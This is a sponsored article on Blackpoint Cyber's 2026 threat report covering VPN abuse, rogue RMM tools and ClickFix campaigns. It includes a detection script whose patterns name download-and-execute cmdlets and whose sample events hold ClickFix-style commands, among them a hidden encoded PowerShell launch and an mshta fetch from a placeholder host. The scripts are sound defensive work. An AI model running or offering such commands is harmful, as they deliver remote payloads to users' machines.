Blackpoint Cyber's 2026 Threat Report: Attackers Favor Legitimate Access Over Exploits
A new report from **Blackpoint Cyber** reveals a concerning trend: attackers are increasingly leveraging legitimate access paths and trusted tools to infiltrate organizations, rather than relying on traditional vulnerability exploitation. The 2026 Annual Threat Report highlights the shift in attacker behavior based on analysis of thousands of security investigations.

Remote access and trusted administrative tools are now central to both organizational operations and intrusion strategies, according to **Blackpoint Cyber**'s 2026 Annual Threat Report.
The report, derived from thousands of security investigations, emphasizes a significant change in attacker tactics: a move away from vulnerability exploitation towards the use of valid credentials, legitimate tools, and routine user actions.
The report analyzes these patterns, documents where intrusion activity was disrupted, and provides defensive priorities based on incident response outcomes observed throughout 2025.
**➡️ [Register for the webinar](https://blackpointcyber.com/webinar/inside-the-soc-ep002-blackpoint-2026-annual-threat-report/?utm_campaign=37935163-2026_webinar_inside-the-soc&utm_source=bleeping_computer&utm_medium=sponsored_article&utm_content=episode-002)**
## Key Findings From the 2026 Annual Threat Report
### Attackers Are Entering Through Legitimate Access Paths
The report indicates that attackers are now more likely to log in using legitimate access methods than to exploit vulnerabilities to gain initial entry.
SSL VPN abuse accounted for 32.8% of all identifiable incidents, making it a primary initial access vector. Attackers often authenticate using compromised credentials, resulting in VPN sessions that appear legitimate to security controls.
These sessions often grant broad internal access, enabling attackers to move quickly toward high-value systems without immediately triggering alerts.
### Trusted IT Tools Are Being Used Against Organizations
The report also highlights the frequent abuse of legitimate Remote Monitoring and Management (RMM) tools for access and persistence.
RMM abuse was present in 30.3% of identifiable incidents, with **ScreenConnect** being prominent in over 70% of rogue RMM cases. These tools are commonly used for IT administration, making unauthorized installations difficult to detect without strong visibility.
Environments with multiple remote access tools are more susceptible to rogue instances blending in with existing tooling.
### Social Engineering, Not Exploits, Drove the Majority of Incidents
While legitimate access paths are a major concern, user interaction remains the largest driver of overall incident volume.
Fake CAPTCHA and ClickFix campaigns accounted for 57.5% of all identifiable incidents, making them the most common attack pattern. These campaigns rely on deceptive prompts that instruct users to paste commands into the Windows Run dialog; the pasted commands then run through built-in Windows tools, so no traditional malware download or exploit activity is involved.
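Because the Run dialog is hosted by explorer.exe, a pasted ClickFix command typically appears in endpoint telemetry as explorer.exe spawning a scripting host with flags that hide the window or obscure the command. The following detection logic is an added example written for this article, not code from Blackpoint Cyber or the report; the process-creation events, the score threshold and the heuristic patterns are all constructed and assumed, and a real deployment would tune them against its own baseline.

```python
"""Flag process-creation events that fit the ClickFix / fake-CAPTCHA pattern.

Added example (not from Blackpoint's report). The events below are constructed
and the heuristics are assumptions to be tuned per environment.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


# Scripting hosts and LOLBins that ordinary users rarely launch from the Run dialog.
RUN_DIALOG_LOLBINS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
    "wscript.exe", "cscript.exe", "rundll32.exe",
}

# Command-line traits that make a Run-dialog launch suspicious (assumed heuristics).
SUSPICIOUS_FLAGS = [
    re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),                       # hidden window
    re.compile(r"-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),   # base64 payload
    re.compile(r"\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest)\b", re.I),
    re.compile(r"https?://", re.I),                                        # remote fetch
    re.compile(r"(?:captcha|verify|human|robot)", re.I),                   # lure text carried in the paste
]


def score_event(ev: ProcEvent) -> int:
    """Return a heuristic score; 0 means the event does not fit the pattern at all."""
    if ev.parent_image.lower() != "explorer.exe":
        return 0
    if ev.image.lower() not in RUN_DIALOG_LOLBINS:
        return 0
    # 1 point for the explorer.exe -> LOLBin shape, plus 1 per suspicious trait.
    return 1 + sum(1 for pat in SUSPICIOUS_FLAGS if pat.search(ev.command_line))


def detect_clickfix(events, threshold: int = 2):
    """Return (host, user, score) for every event at or above the threshold."""
    return [(ev.host, ev.user, score_event(ev))
            for ev in events if score_event(ev) >= threshold]


# Constructed sample telemetry; hosts, users and command lines are invented.
SAMPLE_EVENTS = [
    ProcEvent("WS-01", "bob", "explorer.exe", "powershell.exe",
              "powershell.exe -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE= "
              "# I am not a robot - reCAPTCHA Verification ID: 7921"),
    ProcEvent("WS-02", "alice", "explorer.exe", "mshta.exe",
              "mshta.exe https://example.invalid/verify-human"),
    ProcEvent("WS-03", "carol", "explorer.exe", "cmd.exe",
              "cmd.exe /c ipconfig /all"),               # legitimate admin habit
    ProcEvent("SRV-01", "SYSTEM", "services.exe", "powershell.exe",
              "powershell.exe -w hidden -File C:\\Scripts\\backup.ps1"),   # scheduled task, wrong parent
    ProcEvent("WS-04", "dave", "explorer.exe", "notepad.exe",
              "notepad.exe C:\\Users\\dave\\notes.txt"),
]

if __name__ == "__main__":
    for host, user, score in detect_clickfix(SAMPLE_EVENTS):
        print(f"{host}\t{user}\tscore={score}")
```

The parent-process check is what separates this from a generic "hidden PowerShell" rule: the same command launched by a scheduled task or an RMM agent has a different parent and is left to other detections, while an interactive Run-dialog launch by a user is exactly the behaviour the campaigns depend on.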
### Cloud Intrusions Focused on Session Reuse After MFA
Even with multi-factor authentication (MFA) enabled in many cloud environments, account compromise still occurred.
Adversary-in-the-Middle phishing accounted for approximately 16% of cloud account disablements. Attackers captured authenticated session tokens issued after successful MFA and reused them to access cloud services. From the cloud platform's perspective, this activity appears as a legitimate authenticated session.
## From Initial Access to Network Pivoting
Many of these attacks begin with legitimate access, but the real damage occurs during the subsequent stages.
In a recent investigation, **Blackpoint Cyber**'s SOC identified a new implant called Roadk1ll, designed to pivot across systems using WebSocket-based communication and maintain access while blending into network traffic.
## What These Findings Mean for Security Teams
The report highlights a consistent pattern across industries, environments, and attack types: successful intrusions often rely on activity that blends into normal operations.
Attackers are abusing everyday workflows such as remote logins, trusted tools, and standard user actions, instead of relying on novel exploits or advanced malware. Based on the analyzed attack chains, the report identifies several defensive priorities:
* Treat remote access as high-risk, high-impact activity.
* Maintain a complete inventory of approved RMM tools and remove unused or legacy agents.
* Restrict unapproved software installations and limit execution from user-writable directories.
* Apply Conditional Access controls that evaluate device posture, location, and session risk.
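The inventory and execution-path priorities above can be turned into a recurring audit. The script below is an added example written for this article, not Blackpoint's or the report's code: it checks endpoint software inventory against an allowlist of approved RMM products and their expected install paths, flags RMM agents that are unapproved or installed somewhere unexpected (including a second instance of the approved product), flags executables running from user-writable directories, and reports hosts with more than one RMM product. The inventory records are constructed, the RMM binary names are assumed from publicly documented installs, and the approved install path uses a labelled placeholder for the organisation's own instance.

```python
"""Audit endpoint inventory for rogue RMM agents and user-writable execution.

Added example (not from Blackpoint's report). Inventory records are constructed;
RMM binary names are assumed and should be replaced with your own signature list.
"""
from collections import defaultdict
from pathlib import PureWindowsPath

# Assumed mapping of RMM product -> agent/service binary names (lowercase).
RMM_SIGNATURES = {
    "ScreenConnect": {"screenconnect.clientservice.exe", "screenconnect.windowsclient.exe"},
    "AnyDesk": {"anydesk.exe"},
    "TeamViewer": {"teamviewer.exe", "teamviewer_service.exe"},
    "Atera": {"ateraagent.exe"},
}

# Path fragments that a non-admin user can write to (assumed, compared lowercase).
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")

# Approved RMM products and the install-path prefix each one is expected under.
# CORP-INSTANCE-ID is a placeholder for the organisation's own instance folder.
APPROVED_RMM = {
    "ScreenConnect": "c:\\program files (x86)\\screenconnect client (corp-instance-id)\\",
}


def rmm_product(image_path: str):
    """Return the RMM product an executable belongs to, or None."""
    name = PureWindowsPath(image_path).name.lower()
    for product, binaries in RMM_SIGNATURES.items():
        if name in binaries:
            return product
    return None


def in_user_writable_dir(image_path: str) -> bool:
    p = image_path.lower()
    return any(marker in p for marker in USER_WRITABLE_MARKERS)


def is_approved(product: str, image_path: str, approved) -> bool:
    """Approved only if the product is allowlisted AND sits under its expected path."""
    return product in approved and image_path.lower().startswith(approved[product])


def audit_inventory(records, approved):
    """records: iterable of (host, image_path). Returns sorted (kind, host, subject, path) findings."""
    findings = []
    rmm_per_host = defaultdict(set)
    for host, path in records:
        product = rmm_product(path)
        if product:
            rmm_per_host[host].add(product)
            if not is_approved(product, path, approved):
                findings.append(("rogue_rmm", host, product, path))
        if in_user_writable_dir(path):
            findings.append(("user_writable_exec", host, product or PureWindowsPath(path).name, path))
    # More than one RMM product on a host is where rogue instances blend in.
    for host, products in rmm_per_host.items():
        if len(products) > 1:
            findings.append(("multiple_rmm", host, ",".join(sorted(products)), ""))
    return sorted(findings)


# Constructed sample inventory: (host, full path of a running or installed executable).
SAMPLE_INVENTORY = [
    ("WS-01", "C:\\Program Files (x86)\\ScreenConnect Client (CORP-INSTANCE-ID)\\ScreenConnect.ClientService.exe"),
    ("WS-02", "C:\\Program Files (x86)\\ScreenConnect Client (UNKNOWN-INSTANCE)\\ScreenConnect.ClientService.exe"),
    ("WS-02", "C:\\Users\\bob\\AppData\\Local\\Temp\\AnyDesk.exe"),
    ("WS-03", "C:\\Program Files\\Atera Networks\\AteraAgent\\AteraAgent.exe"),   # legacy, no longer approved
    ("WS-04", "C:\\Users\\alice\\Downloads\\invoice_viewer.exe"),
    ("WS-04", "C:\\Windows\\System32\\svchost.exe"),
]

if __name__ == "__main__":
    for kind, host, subject, path in audit_inventory(SAMPLE_INVENTORY, APPROVED_RMM):
        print(f"{kind:20} {host:7} {subject:25} {path}")
```

Matching on product name alone would pass the second ScreenConnect agent on WS-02 as approved; tying approval to the expected install path is what surfaces a second instance of the same product, which is the "blending in" case the report describes.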
These patterns were documented across frequently targeted sectors, including manufacturing, healthcare, MSPs, financial services, and construction.
**➡️ [Register to receive the 2026 Annual Threat Report](https://blackpointcyber.com/webinar/inside-the-soc-ep002-blackpoint-2026-annual-threat-report/?utm_campaign=37935163-2026_webinar_inside-the-soc&utm_source=bleeping_computer&utm_medium=sponsored_article&utm_content=episode-002)**